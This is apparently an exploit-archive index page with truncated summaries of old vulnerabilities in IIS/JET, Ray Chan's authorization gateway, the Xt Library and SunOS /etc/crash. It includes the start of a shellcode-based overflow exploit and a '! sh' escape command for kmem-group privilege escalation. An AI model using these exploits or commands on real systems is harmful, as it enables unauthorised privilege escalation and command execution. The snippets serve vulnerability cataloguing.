Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA

source: https://www.securityfocus.com/bid/286/info Microsoft's JET database engine feature allows the embedding of Visual Basic for Application in SQL string expressions and the lack of metacharacter filtering by many web applications may allow remote users to execute commands on the system...

Ray Chan WWW Authorization Gateway 0.1 - Command Execution

Ray Chan WWW Authorization Gateway 0.1 - Command Execution source: https://www.securityfocus.com/bid/152/info A vulnerability exists in the WWW Authorization Gateway program written by Ray Chan. Version 1.0 fails to eliminate characters with special meaning to the shell prior to executing a...

Xt Library - Local Privilege Escalation

Xt Library - Local Privilege Escalation include include include define DEFAULTOFFSET 0 define BUFFERSIZE 1491 long getespvoid asm"movl %esp,%eax\n"; mainint argc, char argv char buff = NULL; unsigned long addrptr = NULL; char ptr = NULL; char execshell = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b...

SunOS 4.1.3 - etccrash SetGID kmem Privilege Escalation

SunOS 4.1.3 - etccrash SetGID kmem Privilege Escalation source: https://www.securityfocus.com/bid/59/info /etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem. $ /etc/crash !...

SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation

source: https://www.securityfocus.com/bid/59/info /etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem. $ /etc/crash ! sh...